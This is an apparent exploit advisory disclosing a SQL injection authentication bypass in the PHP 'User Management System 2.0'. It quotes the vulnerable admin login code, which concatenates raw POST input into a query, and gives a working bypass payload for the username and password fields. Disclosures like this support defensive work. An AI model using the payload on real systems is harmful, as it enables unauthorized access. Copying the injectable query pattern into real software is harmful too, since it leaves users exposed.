User Management System version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
742f434df273b4ae21ffff193003416f
# Exploit Title: User Management System 2.0 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here (admin login: /admin/index.php):
<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="manage-users.php";
$_SESSION['login']=$_POST['username'];
$_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="*Invalid username or password";
$extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}
2- We can bypass authentication with SQLi:
Bypass code (user and admin login panel):
Username: pentester' or'1'=1#
Password : pentester' or'1'=1#
Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...